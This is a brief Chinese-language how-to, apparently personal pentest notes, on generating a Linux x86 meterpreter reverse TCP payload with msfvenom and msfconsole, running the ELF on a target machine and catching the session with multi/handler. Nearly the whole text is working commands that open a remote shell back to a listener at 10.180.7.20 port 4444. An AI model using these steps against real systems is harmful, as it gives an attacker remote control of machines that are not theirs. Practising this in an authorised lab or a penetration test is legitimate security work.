1、CLI下生成payload
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elf

2、msfconsole下生成payload
use payload/linux/x86/meterpreter/reverse_tcp 並設置option

generate -h 有豐富的選項

generate -f elf -o /shell.elf 根據需要添加選項 -o輸出文件到指定目錄

3、在靶機上執行該文件,並在msf下監聽
在靶機上給文件賦值,並執行該文件

在msf監聽端口
msf > use exploit/multi/handler msf > set payload linux/x86/meterpreter/reverse_tcp msf > set LHOST 10.180.7.20 msf > run
